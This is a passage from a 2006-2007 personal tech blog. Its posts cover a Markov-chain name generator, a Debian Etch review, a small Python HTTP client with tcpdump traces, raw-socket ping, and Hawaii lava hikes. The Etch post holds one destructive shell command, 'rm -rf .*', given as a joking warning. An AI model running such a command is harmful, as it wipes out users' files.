2007-02-12 Finding good names

It happens all the time. I am about to start a new project and I can't find a good name. I could postpone the decision until publication. With my completion rate, that would save me a lot of thinking. Still, the name of a project, a programming one at least, is scattered all over the place from the start: you create a tree in your cvs/git/svn, you create a package/namespace/module in your programming environment and you write the project's name in the documentation (at least you intend to). You can change the name later but you save a lot of work if you start with the right one.

There was a time when you could pick a random word from the dictionary and be done with it. Today, it seems, all the real words are taken, even vellication. Here I use a widely accepted definition of "taken": the .com is owned by someone else. There are other root domains (.net, .org, .info) but the squatters bought most of the dictionary there too. If we don't limit ourselves to the dictionary, and why should we after all, combinatorics saves the day. There are just too many ways to put letters together. Squatters can buy all the three letter acronyms but that's as far as they can get.

My first idea was to use googleability. Googleability, you'll recall, is the quality of being searchable, and found, on Google. Words like "sun", "act" and "run" have low googleability. They are in the 0.1% of three letter words with the most Google hits. At the other end of the spectrum, you get words like "bxu" and "yzo" that no one seems to put on his website (though this self-referential sentence invalidates its claim). If your friend tells you about YZO's new BXU, you can google it and you will find the right website. Googleability works but I wasn't the first to think about it. Almost all pronounceable three and four letter words with high googleability have a registered .com. Exploring longer words is a challenge. Google doesn't like scripts: you have to fake a browser and limit the query rate. I didn't. I seriously considered finding a new Internet service provider when I noticed that Google had banned me.

What is pronounceable? Some people can pronounce "w00t" and "pwned" but most can't. If you limit yourself to an alternation of vowels and consonants you will get pronounceable words but you will miss the really good ones. On the other hand, allowing sequences of more than one consonant will yield words like "evzupricb". I was looking for a quality more subtle than just being pronounceable. Some words are warm, others are frigid. Anglo-Saxon and Norse words, for example, are more visceral than Latin ones. The battles against the Orcs are not fought in Polytanie, they are fought in Azeroth. How could I capture this warmth, this evasive quality with the taste of raw meat?

Actually, that's quite simple. A lively text will contain more warm words than frigid ones. Extracting the warmth is just a matter of measuring the probability of going from one letter to the next, including the probability that a given letter will end the word. A probabilistic engine trained on the King James Bible will produce a lot of old English sounding words. One last change is required though: the probability of going from "l" to "l" will be way too high and you'll end up with words like "alllerit". The full transition table with a two letter prefix could be large, but recording only the transitions that you actually see keeps the table under 100k. And it makes sense to do so. In the King James Bible, the only thing that can follow "pr" is a vowel. Furthermore, "pr" will never be at the end of a word, unlike "ps", which ends a word 80% of the time.
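To make this concrete, here is a minimal sketch of such an engine (an illustration of my own, not the exact code I ended up using): an order-2 letter model that records only the transitions it has seen, including the end-of-word transition, then walks the table at random.

    #!/usr/bin/python
    # Train an order-2 letter-transition model on a plain text file
    # and generate words from it. "^" pads the start, "$" ends a word.
    import random, re, sys

    table = {}                           # "pr" -> letters seen after "pr"
    for word in re.findall(r"[a-z]+", open(sys.argv[1]).read().lower()):
        word = "^^" + word + "$"
        for i in range(len(word) - 2):
            table.setdefault(word[i:i+2], []).append(word[i+2])

    def generate():
        word = "^^"
        while not word.endswith("$"):
            # every prefix we can reach was seen in the training set,
            # so the lookup never fails
            word += random.choice(table[word[-2:]])
        return word[2:-1]

    for i in range(10):
        print generate()

The duplicate entries in the lists double as frequency weights: a transition seen twice is picked twice as often.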

Now that we have the rules to generate as many vivid words as we want, we just need to keep trying until we find one for which the .com is still available. Is it good? Judge for yourself: as I write this, those words are available in at least two of the four main top level domains: abongs, abuted, affere, againg, amigeth, andreph, becomoses, becured, beffer, behosest, brisraell, challed, chout, egived, egyptayed, fatieford, fifies, flooses, gaing, humple, israndee, istion, joyether, judan, judgenst, kethich, morthers, moshall, offeruiled, prieven, reoph, rient, rought, sayints, shaarding, shaith, shalleak, sheaveth, speople, spild, tathild, therecaust, theried, thits, togypt, waying, whing, whings, whous, womenty. Nothing was hand picked, just random generation. We get names but we also get verbs, adverbs and adjectives. I wonder if this is how they create artificial languages.
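The availability test itself is easy to automate with a whois query: the whole protocol is "open TCP port 43, send the name, read the text". A hedged sketch, assuming the .com registry whois at whois.verisign-grs.com and its "No match" convention (other TLDs use other servers and other wordings):

    #!/usr/bin/python
    # Ask the .com registry whois whether a domain is still free.
    import socket

    def available(domain):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(("whois.verisign-grs.com", 43))
        sock.send(domain + "\r\n")       # that's the whole whois protocol
        reply = ""
        while True:
            buf = sock.recv(8000)
            if not buf:
                break
            reply += buf
        return "No match" in reply

    print available("vellication.com")

Be gentle with the query rate; registries ban abusers just like Google does.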

Changing the training set to the weekly top 100 on Project Gutenberg produces a contemporary lexicon: adays, amalls, anned, appeance, appene, bectinty, cassion, descess, droort, eliked, exterid, flonst, hered, honsir, humety, immang, intanch, jused, losed, maketter, mathere, matinswer, opecous, othersuld, pears, pened, plorn, preathilly, prowhich, reard, reentich, retcheing, scrove, shoul, soothred, soubjes, spilly, squoully, therigh, throppen, unlip, vidded, wanked, whallon, wherents, whicars, whide, wouldishon, woute, youthered. Not as exotic but still credible.

I still don't have a magic trick to pick a project name but at least I can now limit the search space. I let my computer check which words are taken during the night and I contemplate a few pages of candidates in the morning. My name generator even found its own name. Here is Yould. Now I need to find good texts for the training set.

2007-02-08 On Firestarters

There I was, overlooking the Kilauea, one km above sea level, 3700 km from the closest continent, in the middle of a vast treeless lava field. There was a pleasant yet strong breeze making the tropical Sun easier to bear. It was lunch time and I was looking forward to a hot meal after all the rough hiking.

I was well prepared with my, mostly homemade, ultra-light backpacking gear: Cobra Stove, aluminum foil wind screen, mesh pot stand and camping saucepan. Everything was perfectly calculated: with 175 ml of alcohol I was good for six meals, all that was needed for an overnight back-country trip with a generous margin for error. I had a watertight matchbox with a capacity of 20; that was more than enough. Right?

Compared to other Zen Stove designs, the Cobra is more fuel efficient. Construction is as simple but you need a primer pan (video by Don Johnston) in order to reach the inner pressure that makes the jets burn on their own. The principle of the primer pan is simple: you let your stove sit in a (really small) bath of alcohol that you set ablaze. If the bath is too small, the stove won't get hot enough and you have to repeat the procedure, no big deal. If the bath is too big, the stove gets too hot, and you might have noticed that the design doesn't include a relief valve. If you are lucky, you waste all your fuel in a few seconds of 50 cm flames; otherwise the stove blows up. Obviously, I tend to make small primer baths.

Back to Kilauea. First match: blown out by the wind. Second: OK, but the primer pan gets blown off. Everything is fine with the third one, except that the primer pan was too small after all... Simple math: at this rate it's four matches per meal, and 4*6=24; the matchbox won't do the trick and I must find a replacement. If you think that I could just carry a 2$ disposable cigarette lighter, you are definitely not part of the target audience and you can safely stop reading now. If your first thought was that I just had to use my hammock ropes to make a bow and start a fire like the Indians used to, read on.

In high school, I listened to Manowar. There was this song, Black Wind, Fire and Steel. I'm still not sure what it was supposed to mean, but you have to admit that it is catchy to put the key material of the industrial revolution and the fetish of all pyromaniacs in the same sentence. I was checking Think Geek, actively procrastinating, when I first saw something called Swedish Firesteel. How could something called Firesteel not be great? I mean, something with sparks at 3000°C, that works when wet, in any weather, at any altitude. As solid packages of raw power go, this must be right next to energon cubes. I needed to replace the matchbox anyway; that was excuse enough.

I was able to get the demo from my favorite army surplus for 10$. Every time I walk into this store the dealer goes "where did you get this old Russian army coat?" and as usual, I remind him that he sold it to me. That seems to please him and he always offers me a bargain on whatever I came looking for, as long as I pay cash... My Firesteel looks similar to the one on Think Geek except that the provided striker is a plain rounded rectangle, not the serrated one. As far as I can tell, this is an older model by Light My Fire: web stores advertise Light My Fire's Firesteels with pictures of the model I have.

This Firesteel is nice. It only weighs 75 g and you do get a lot of bright sparks with each stroke of the striker, even when wet. Sparks fly about 20 cm away; lighting a primer pan with it is trivial. But igniting something more stable than methanol is something else. My first attempts to light paper took an average of 50 strikes. Toilet paper was easier, with an average of 25 strikes. How can something that burns at 3000°C not light paper instantly? We should not confuse heat, the quantity of energy, with temperature, roughly the energy per molecule. The few molecules in the bright sparks have a high temperature but they don't carry much heat. Using my knife as a striker did produce more sparks and made lighting paper a lot easier. The problem is that rubbing a knife against a metal rod destroys the sharp edge in no time. A simple solution is to carry a sacrificial edge. Fair enough. With a little filework I gave a crude edge to the striker provided with the Firesteel. The result is pretty good. I can light paper with an average of five strokes; toilet paper usually burns in two. The striker is not made of tempered steel and it loses its edge faster than a knife. Fortunately, the crude bevel takes no time to reshape. Rubbing it against a rock would be enough; no need to add a file to the ultra-light backpacking gear. The poor performance of the plain striker is probably why Light My Fire now provides a serrated one.

Even with the improved striker, you need to carry something easy to ignite. Light My Fire sells Maya Dust, a convenient tinder but also an acknowledgment that the Firesteel is more related to flint and steel than to a modern firestarter that combines knowledge of piezoelectricity with advanced polymers into a pocket-sized package: the cigarette lighter. The state of the art cigarette lighter also comes from Sweden; it's the Silva Storm Helios. Why do Swedes come up with all the high-tech firestarters? It probably gets really cold there. That, or too much Swedish metal turned the dwellers into arsonists.

2007-01-03 Etch

Etch has been frozen for about a month now and will soon become the new stable Debian. I ran Sarge (the current stable) on my desktop while it was still in testing, and since I liked the experience I decided to give Etch a try during the winter break.

Among the major improvements, there is now a graphical installer and AMD64 became an official architecture. Aside from that, all the packages are upgraded to bleeding edge versions and there are quite a few newcomers. A full binary download is now 21 CDs; double that if you want the sources. All of those packages have now passed the freeze, so we can expect Etch to be the most complete distribution ever released, though Gentoo can't be far behind.

The install went smoothly. The console install is pretty much the same, with the "normal" mode asking even fewer questions than before. No doubt, anyone can install this distribution. The graphical install is cute but the transitions are sometimes strange and the "next" button doesn't always do what one would expect. Hopefully this will be fixed before the release. I had no problem setting up software RAID over SATA at install time, with / and /boot on LVM on top of the RAID. I heard people have had problems with that setup on other distros; so far I haven't noticed any glitches. Of course I didn't burn the 21 CDs: the usual way to install Debian is to burn only the "netinst" CD and to use the excellent apt tool to install packages from the network when you need them. Apt performs all the dependency calculations and, compared to yum and urpmi, it is blindingly fast (disclaimer: the last time I used urpmi was a few years ago, it might be better now).

Some packages still have a few minor bugs but the overall experience so far is great. The new KDE 3.5.5 now features text-to-speech integration. KDE must have been tuned lately because it feels really snappy and responsive, even over XDMCP. I was able to keep /home unchanged and everything just worked. It's good to know that systems with many more users are likely to upgrade smoothly, because no one likes to nuke his .kde when he arrives on Monday morning. By the way, rm -rf .* is never a good idea (someone out there knows what I'm talking about).

For a system that isn't mission critical, I think that Etch is ready now and I encourage everyone to try it. Debian Etch is a flexible meta distribution that can be shaped into either a desktop or a server without loss of usability or stability.

2006-12-29 Fract and Music

One problem with a really stable system is that you don't notice when your init scripts are broken. Fract has been down for the last few days. It turns out it wasn't restarting properly after a power cycle... It should be OK now, but don't hesitate to annoy me by email if things aren't working as expected.

Now let's talk about music. Most music today is complete crap. Musicians stick to "the formula": always the same playtime, the same instruments, the same verse/chorus alternation, the same... The best artists can produce excellent stuff but for some reason they won't refrain from publishing the crap too, and they publish a lot of it... Take Wumpscut as an example: Draussen and Totmacher are among the most brilliant music since Beethoven, but if you are dumb enough to just drop the CD in your player and push play you'll fall on crap like Wolf and Mortal Highway. Worse, there is plenty of random noisish padding like Phase Shifter and Believe in Me. Am I supposed to care that you recorded the sound test of your latest reverb pedal? This guy must be smart; can he really not tell what is crap and what is good?

And if you pick a random artist, the good/crap ratio drops really fast. The obsolete CD distribution model is probably to blame for that. Would you pay 20$ for 2 songs? Probably not; nevertheless people like to pay 20$ for 2 good songs plus a bunch of padding tracks. But what do you expect, that people won't notice how low the good/crap ratio is? No wonder people turned to file sharing and Internet stores. And then there is the RIAA, who made themselves obsolete and prefer to sue people instead of adapting. The RIAA tries to destroy the public domain and fair use in the hope that people won't notice the extent of the lie.

Boycotting the RIAA is a duty: if we let them have their way, they'll destroy the concept of folklore and free culture. But they more or less control the radio stations, and with the current good/crap ratio, radios play a really important filtering role. When I first tried to get RIAA-free music, the only sources were managed by relativist utopians who believed that all music was created equal. The good/crap ratio was lower than if you had bought random CDs from a music store. After all, record companies will at least try to put one "good" song per CD.

So I decided to listen to no music at all instead of listening to RIAA and/or crap music. Now let's all rejoice, because I finally found a RIAA-free radio that cherry picks the good stuff and filters out the crap. Epiphany Radio plays really good ambient techno and all the music is certified 100% RIAA free. Most songs are lyrics-free, which makes Epiphany a pretty good background when working. The 128k stream is reliable with very few glitches. So far I'd rate it 7.5/10. At some point people will hopefully stop releasing the crap stuff; Beethoven didn't release his crappy experiments after all. Until then we will probably need radios.

Where do you find your RIAA free, non-crap music?

2006-12-07 CRA Outstanding Undergraduate Award

The Computing Research Association promotes research in computer science and related fields. At first I was disappointed to get only an honorable mention for its outstanding undergraduate award, but since the announcement I have received several emails from top tier universities inviting me to apply to their grad schools. I guess an honorable mention is honorable after all. Now, how am I going to cope with all the paperwork...

2006-11-29 HTTP Illustrated

In TCP/IP Illustrated, Richard Stevens describes the TCP/IP protocol stack by generating interesting situations and looking at what happens on the wire with tcpdump. Don't look for pretty illustrations; "illustrated" here means "by examples".

This is an excellent set of books, a bit dated, but the technique lives on. Learning this stuff by just reading the RFCs must be painful. For some reason the RFC editors want the official documents to be plain ASCII with manual page breaks. For the nostalgic it must feel good to read documents in 2006 that look exactly like a bunch of typewritten pages from 1966. The RFC editor even recommends using troff to "typeset" the documents... Let's hope that they hear about Docbook one of these days. OK, Docbook is not that nice; we can blame XML's verbosity for most of the problems, and the rest of the blame goes to the extremely fragile tool chain that is considered "standard" on most GNU/Linux distributions. But at least with Docbook you can hack your own tool chain and you'll end up with stuff that doesn't look like crap.

In the meantime, fooling around with the protocols is fun. I had this friend who really liked to send emails in raw SMTP by telnetting to his mail server. I'm still not sure if it was because he liked that or because XFree86 was still compiling on his gentoo box (or was it a LFS?). Nevertheless, now I understand why he managed to get the big bucks as a sysadmin while I wasted my time coding reporting code for balance sheets. I'd link to his website but he tells me that he doesn't have one anymore; it had something to do with compilations that never finished...

So I started to telnet to port 80 on my favorite webservers. HTTP is a bit verbose, so I soon opted to hack a micro HTTP client. Thanks to the socket module I can do that in a really small Python script:

#!/usr/bin/python
import socket as s
import sys

CHUNK = 8000

if len(sys.argv) != 2:
    print "USAGE: %s host" % sys.argv[0]
    sys.exit()

host = sys.argv[1]
sock = s.socket(s.AF_INET, s.SOCK_STREAM)
sock.connect((host, 80))
# HTTP/1.1 wants \r\n line endings and a Host header
sock.send("GET / HTTP/1.1\r\n")
sock.send("Connection: close\r\n")
sock.send("Host: %s\r\n\r\n" % host)

done = False
chunks = []
while not done:
    buf = sock.recv(CHUNK)
    chunks.append(buf)
    print buf
    print "** read %4d bytes" % len(buf)
    if len(buf) == 0:   # recv returns "" when the server closes
        done = True
print "DONE"

# headers are sometimes interesting
for l in "".join(chunks).split("\r\n"):
    if not l.strip():   # a blank line ends the headers
        break
    print l

Anything interesting that wasn't expected? You bet! First of all, the W3C pretends that you should always be able to use HTTP 0.9 to some extent. In 0.9 you can fetch foo.html with GET foo.html\n\n and that's it: no headers or funny stuff. Well, forget about that: no one cares about retro compatibility and they'll close the connection as soon as you try. This isn't really a problem, just a reality check between what you read in textbooks and what happens on the wire. And then there is this persistent connection thingy. If you are a web browser that's probably a good thing, but if you are just fooling around, you really want to get rid of it: Connection: close\n
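You can check the 0.9 story for yourself with a three line variation on the script above (the host is a placeholder, pick any server you want to poke):

    #!/usr/bin/python
    # An HTTP/0.9 request: no version, no headers. A true 0.9 reply is
    # raw HTML with no status line; most servers just close on you or
    # answer in 1.x anyway.
    import socket

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("www.example.com", 80))
    sock.send("GET /\r\n")
    print sock.recv(8000)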

All respectable webservers will answer whether you prepend www or not. Half of them redirect to www if you don't prepend; the other half redirect to the bare domain if you do. A tiny fraction really doesn't care and spits out the content right away. Another tiny fraction really wants you to prepend and yells at you if you don't. I must be missing something, because www seems obsolete to me.

You can learn a lot about the structure of the generating code on the webserver just by looking at how the stuff is sent to you:

$ python mini-web.py www.uqam.ca
** read 1440 bytes
** read 1440 bytes
** read 1440 bytes
** read   45 bytes
** read 1440 bytes
** read 1440 bytes
** read 1332 bytes
** read 1440 bytes
** read 1440 bytes
** read  727 bytes
** read    0 bytes
DONE

Here the server spits out the content in three bursts. On closer inspection we see that the bursts correspond to the usual web page division: common head, inner content, common footer. But why chunks of 1440 bytes? Here is a hint: I'm connected with DSL. Here is another hint; tcpdump has this to say:

# tcpdump port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
11:53:33.437125 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                S 2059998486:2059998486(0) win 5840 
                <mss 1460,sackOK,timestamp 468230511 0,nop,wscale 2>
11:53:33.481900 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                S 3362836129:3362836129(0) ack 2059998487 win 25920 
                <nop,nop,timestamp 3450314929 468230511,
                 nop,wscale 0,nop,nop,sackOK,mss 1460>
11:53:33.481948 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                . ack 1 win 1460 
                <nop,nop,timestamp 468230556 3450314929>
11:53:33.482148 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                P 1:16(15) ack 1 win 1460 
                <nop,nop,timestamp 468230556 3450314929>
11:53:33.518047 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                . ack 16 win 25920 
                <nop,nop,timestamp 3450314933 468230556>
11:53:33.518102 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                P 16:53(37) ack 1 win 1460 
                <nop,nop,timestamp 468230592 3450314933>
11:53:33.568422 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                . ack 53 win 25920 
                <nop,nop,timestamp 3450314938 468230592>
11:53:33.624884 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                . 1:1441(1440) ack 53 win 25920 
                <nop,nop,timestamp 3450314943 468230592>
11:53:33.625055 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                . ack 1441 win 2184 
                <nop,nop,timestamp 468230699 3450314943>
11:53:33.629372 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                P 1441:2881(1440) ack 53 win 25920 
                <nop,nop,timestamp 3450314943 468230592>
11:53:33.629448 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                . ack 2881 win 2908 
                <nop,nop,timestamp 468230704 3450314943>
11:53:33.634043 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                P 2881:4321(1440) ack 53 win 25920 
                <nop,nop,timestamp 3450314943 468230592>

Specifically, look at the SYN packets (ogre is my workstation): both ends advertise an mss of 1460, the payload of a full Ethernet frame. But I'm on DSL, and PPPoE eats 8 bytes of the 1500 byte Ethernet MTU, leaving 1492. Subtract 20 bytes of IP header, 20 bytes of TCP header and 12 bytes of timestamp options and you get exactly 1440 bytes of payload. Everything adds up. We also notice that splitting the packets is slow enough for the script to have time to print to the console before another packet is read. From this we can conjecture that a bigger mss would probably crank up throughput significantly (or that I need a faster link). The initial handshake took 50 ms, which isn't that much, but it is still something that persistent connections save for free on subsequent GETs.

Anything else? Not really, except maybe that there are Easter eggs in the Slashdot HTTP headers. Yahoo.ca replies with a 404 on / about 30% of the time; I guess these guys don't care about monitoring... All of this is a lot of fun, isn't it? How I wish I had done that before my trip to Silicon Valley!

; )

2006-11-22 Raw Sockets

Python is sometimes described as "just a scripting language". This shows how much some people want to sort all programming languages into two or three categories without even knowing what they are talking about.

One nice thing about Python is the way it exposes the Unix internals. Almost all the system calls have bindings with an interface so close to C that you can follow the man pages when using them. Of course, efficiency is not always there, but you can sketch out a solution in no time and fall back to C when the profiler tells you to do so.
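For instance, the os module follows fork(2), execvp(3) and waitpid(2) almost word for word. A trivial sketch of my own, running date in a child process:

    #!/usr/bin/python
    import os

    pid = os.fork()                    # fork(2)
    if pid == 0:                       # in the child
        os.execvp("date", ["date"])    # execvp(3): args[0] is the program name, as in C
    os.waitpid(pid, 0)                 # waitpid(2), in the parent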

The socket API is exposed in all its gory details and it is possible to do raw sockets: to build each packet byte by byte, headers included. The C API uses unions that are cast as structs when an individual field needs to be set and cast as byte arrays when written on the wire. The Python API uses string objects, which makes it a bit painful to set a single field but poses no problem when building the packets from scratch.

As an example, it is possible to implement ping in just over 100 lines. Using time.time(), we don't have enough resolution to make accurate readings for round trips under ~5 ms, but it still works pretty much as expected otherwise. Note that if you want to try it you'll need to be root, since that's the only way to access raw sockets (the real ping is setuid).
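I won't paste the whole hundred lines here, but this is the core of the idea, a minimal sketch of my own (assumes Linux, run as root, and skimps on all error handling):

    #!/usr/bin/python
    # Send one ICMP echo request built byte by byte and time the reply.
    import socket, struct, sys, time

    def checksum(data):
        # RFC 1071: one's complement sum of the 16 bit words
        if len(data) % 2:
            data += "\x00"
        s = 0
        for i in range(0, len(data), 2):
            s += (ord(data[i]) << 8) + ord(data[i+1])
        s = (s >> 16) + (s & 0xffff)
        return ~(s + (s >> 16)) & 0xffff

    host = sys.argv[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
                         socket.getprotobyname("icmp"))

    # echo request header: type 8, code 0, checksum, id, sequence
    head = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1)
    data = "raw sockets are fun"
    head = struct.pack("!BBHHH", 8, 0, checksum(head + data), 0x1234, 1)

    start = time.time()
    sock.sendto(head + data, (host, 0))
    buf = sock.recvfrom(2048)[0]    # the reply comes with its IP header
    print "%d bytes from %s: %.1f ms" % (len(buf), host,
                                         (time.time() - start) * 1000)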

A new non-baroque language should aim to be as clever as Python in exposing the host platform internals. CL+UFFI is not bad, and SBCL's sb-posix is especially nice. Skilled use of macros makes the whole binding set easy to read and to maintain:

       (define-call "link" int minusp (oldpath filename) 
                                      (newpath filename))
       (define-call "lseek" sb-posix::off-t minusp (fd file-descriptor) 
                                                   (offset sb-posix::off-t) 
                                                   (whence int))
       (define-call "mkdir" int minusp (pathname filename) 
                                       (mode sb-posix::mode-t))
       (define-call "mkstemp" int minusp (template c-string))
       (define-call "sync" void never-fails)

2006-11-21 San Francisco

I spent a few days last week in the San Francisco Bay area. For a geek, visiting the legendary Silicon Valley is a pilgrimage.

Paul Graham has a few interesting essays on what might make the magic happen in Silicon Valley. Indeed, when you are there you can feel that some magic is going on, but it is incredibly evasive: you can't point at it or describe it, but it's there. You can cross the whole valley on the 101 or even on El Camino and all you see is an endless sprawl. The weather is nice but we are still in Suburbia.

When you visit the computer history museum, the power of the valley starts to unfold. As the guide walks you through the landmark artifacts of the computer world, he will add "[...] was developed just here down the road.", "[...] not far from here in Stanford." or "[...] and he was here last year and told us a story about this computer.". Some companies have really cool offices (taken from here), people move around on kick scooters and all the big players have offices in the area.

Why they go to the ugly sprawl instead of San Francisco is still a mystery to me. San Francisco is a great city. Being on the peninsula keeps the whole thing compact, and compact cities like Montréal are more pedestrian friendly. You can just wander around and stop by an Irish pub or one of the numerous seafood restaurants on Fisherman's Wharf. There is an endless downtown beach with huge waves, but the water is a bit cold so surfers need a wetsuit.

A compact city doesn't mean that you are always trapped between skyscrapers. The Golden Gate Park offers a peaceful environment that would require more than one day to explore. The city has numerous fairly steep hills; parking a car there must be a challenge, and I can only imagine the balancing feat required to park a motorcycle.

Paul Graham probably scores a point when he conjectures that you need great universities to reproduce Silicon Valley. When you walk on the Stanford and Berkeley campuses you feel a majestic excellence. There are Rodin statues and stone arcades all over the place. When you are there, you want to be worthy of this prominence. Even if you are just passing by.

2006-11-11 Walking on Lava

It is about time for another round of pictures from Hawaii. Since everyone prefers lava, and since Hawaii is the only place in the world where tourists freely roam on an active volcano, only a few centimeters from glowing lava, I shall start with the pictures of my hikes on the Kilauea.

But first, since this is a geek's blog, I will do some technical rambling. Digital camera manufacturers boast that their products can capture huge numbers of megapixels. Is this any good for the user? I say hell no! I may be talking through my hat since I have only used one digital camera seriously, but I have received enough pictures from others to be confident that what I say is true.

Do you recall those new parents who sent you an email with only a few pictures totaling several megabytes? Why do they do that? Don't they know that you are using a monitor that can't display such a large image? Do they expect you to zoom in on the youngling to convince yourself that its eyes are closed? Do they expect you to print the picture? A cheap printer with cheap paper can't match this resolution and, sorry buddies, I won't take your pix to a print shop. I'm not saying that parents should not send emails with pictures. What I'm saying is: please, no pictures larger than 300k!

Have you ever tried to zoom in on the youngling to convince yourself that its eyes are closed? I'm pretty sure that no parent has, because they would instantly stop sending those large files. The crappy digital cameras that we have save pictures in jpeg with the compression aggressively cranked up. You might recall that jpeg is a lossy compression format. That means that when you crank it up, you lose something in your picture and it gets replaced by an ugly artefact that is easier to compress. On none of the cameras that I saw was it possible to save in png or to tune the jpeg compression, so your only hope of getting a clear picture is to zoom out. Here is an example of a perfect image, the same image with conservative jpeg compression, with "standard" compression and with aggressive compression.

You could perform the same experiment on your own images with something like this:

     for c in 90 70 50; 
       do convert -quality $c shoe-wrack.png shoe-wrack-$c.jpg;done

As you can see, jpeg compression destroys precisely what makes an image great: the fine details and the smooth gradients. The images produced by your digital camera are useless at the resolution they are saved at, but you can still salvage them for publication now that you know how jpeg works. The idea is to zoom out, averaging each resulting pixel over many pixels from the large image. I don't intend to have you code anything yet, since I'm only asking that you please rescale your images before you reach for your favorite email client. I expected an easy way to batch-rescale a bunch of pictures, and there is one, but the command is quite obscure:

     rename 'y/A-Z/a-z/;s/hpim//' *.JPG
     find -name "*.jpg" -exec convert -affine "0.5,0,0,0.5,0,0" \
                                      -transform -quality 85 {} {} \;

I promise that if you run this command on anything produced by your crappy digital camera, no one will mind that you send him several pictures of your newborn.
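If you'd rather stay in Python than decipher convert's flags, here is a rough equivalent with PIL (assuming the Python Imaging Library is installed; the scale and quality numbers mirror the command above):

    #!/usr/bin/python
    # Halve every jpeg in the current directory and recompress at
    # quality 85. The resize averages pixels, as discussed above.
    import glob
    import Image                # the old-style PIL import

    for name in glob.glob("*.jpg"):
        img = Image.open(name)
        w, h = img.size
        img.resize((w / 2, h / 2), Image.ANTIALIAS).save(name, quality=85)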

So, how about lava, you ask? Yeah, I wanted to publish the whole thing but I was stuck with several hundred megabytes of jpeg compression mess. Once I made up my mind that there wasn't anything I could do with the hi-res images, everything was simple: I could just pack all the images in a tarball and let you enjoy the lava-pack-1. Note that there is no lava-pack-2, but who knows, I might return to Hawaii one of these days. Also noteworthy is the fact that the latest version of tar auto-detects the compression algorithm. That means that if you are running a non-baroque version of GNU/Linux you can just type

     tar -xvf lava-pack-1.tar.bz2

instead of

     tar -zxvf lava-pack-1.tar.bz2 # argh, error!
     tar -jxvf lava-pack-1.tar.bz2 # finally!

In this picture pack you will find several pictures taken around the Kilauea during August 2006. The pictures up to 0327 were taken during the field trip organized by the CASS. I liked the Big Island so much that I went back for a few days after the CASS; the rest of the pictures are from this second trip. The weather is great in Hawaii and there are no nasties: snakes, mosquitoes, Jehovah's Witnesses... So I went camping with nothing more than my hammock, a rain poncho that doubled as a tarp and my zen stove. Mine is a Cobra, completely pressfit without glue or top screw but with inner packing, because my previous stove showed how bad a spill can get.

I used a travel hammock from hammocks.com. This hammock isn't as comfortable as a Mayan but it's still better than self-inflating mattresses and probably better than most beds. It packs really tight in a small sack and makes a pretty good travel companion. The hammock is pretty much waterproof, so when it rains it will collect water and funnel it to your butt. The poncho wasn't large enough to cover the whole thing, so next time I'll bring a larger tarp. The Kilauea is 1250 meters above sea level. It can get chilly at night but a cheap sleeping bag is definitely enough. The main concern should be drinking water: in Hawaii the sun shines hard, and when you walk on a pitch black lava field you get thirsty fast. The Volcano Park has several drinking fountains, so you rarely need to carry more than 2 liters.

When paying for entrance to the Volcano Park you can camp in a nearby campground or go for the real thing and register for back-country camping. I tried both and back country is definitely worth it, but it's not for the faint of heart. You have to hike for at least an hour on the lava field with no markings except an occasional pile of rocks. Once there you have a perfect starry night with glowing red lava all over the horizon line.

The lava field is surrounded by a giant fern forest, so you can't hang a hammock unless you reach the right spot. Don't even think about pitching a tent on the lava field: this stuff is sharp even though it doesn't look that way, and anyone who touches it ends up with a bleeding hand.

The Volcano Park is great for interpretation. You can see sulfur banks, lava tubes and lots of helpful signs, but if you want to get close to the flowing stuff and see lava cascades, you need to reach the Kilauea from the Pahoa side. I was a bit adventurous and I got caught between lava fingers. As long as you have the wind at your back, you can walk about 30 cm from the active flow. When the wind blows the other way around (or even just stops blowing), the heat is unbearable and the sulfuric gasses are suffocating. When I got trapped I could have walked back, but I was low on water, and after a few hours looking at lava you really feel that you understand it (OK, the sulfur might have something to do with it).

The old lava is pitch black. The recent stuff is kind of dark silvery. As long as you are on the black stuff you are safe (well, you are still on an active volcano). It gets tricky if you want to cross the silvery stuff. Really fresh lava has a porous glassy appearance, and as it cools down, it cracks and small chips fly away. So I made my way jumping from one cracked silvery patch to another. At the end I could feel intense heat through the soles of my army boots, but I was back on a black patch with the wind at my back. I guess that running shoes would have melted; we don't pay enough attention to the melting point of the sole when we buy footwear.

In case you are wondering, when the lava falls into the ocean it instantly explodes into tiny fragments that get washed away for a few miles, where they form black sand beaches.

That's it for the lava stories (unless you buy me a beer for a live summary). Stay tuned for more tales of Hawaii!

2006-10-04 On Invocations

There is no doubt that all programming languages have problems and that a new one is needed as soon as possible. Once someone has an idea of what he wants his language to be, he needs to write either a compiler, an interpreter or both. You don't see pure interpreters that much these days; most language implementations at least compile to byte code. Though the principle of a compiler is simple, we see them as obscure forgotten charms carefully crafted by wizards with powerful incantations.

A compiler just translates the text of a program in language A into a program in language B. Technically, the lexer splits the program into tokens. The parser then builds a tree with the tokens and gives this tree some meaning; that's the abstract syntax tree (AST). Finally the code generator walks the tree and prints all the nodes in language B.
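Here is a toy of my own showing the three stages just described (nothing to do with any real compiler): it translates infix arithmetic (language A) into Lisp style prefix (language B), one function per stage:

    #!/usr/bin/python
    import re

    def lex(text):
        # split the program into tokens
        return re.findall(r"\d+|[-+*/()]", text)

    def parse(tokens):
        # build the AST: expr := term (("+"|"-") term)*
        def expr(i):
            node, i = term(i)
            while i < len(tokens) and tokens[i] in "+-":
                op = tokens[i]
                right, i = term(i + 1)
                node = (op, node, right)
            return node, i
        def term(i):
            node, i = atom(i)
            while i < len(tokens) and tokens[i] in "*/":
                op = tokens[i]
                right, i = atom(i + 1)
                node = (op, node, right)
            return node, i
        def atom(i):
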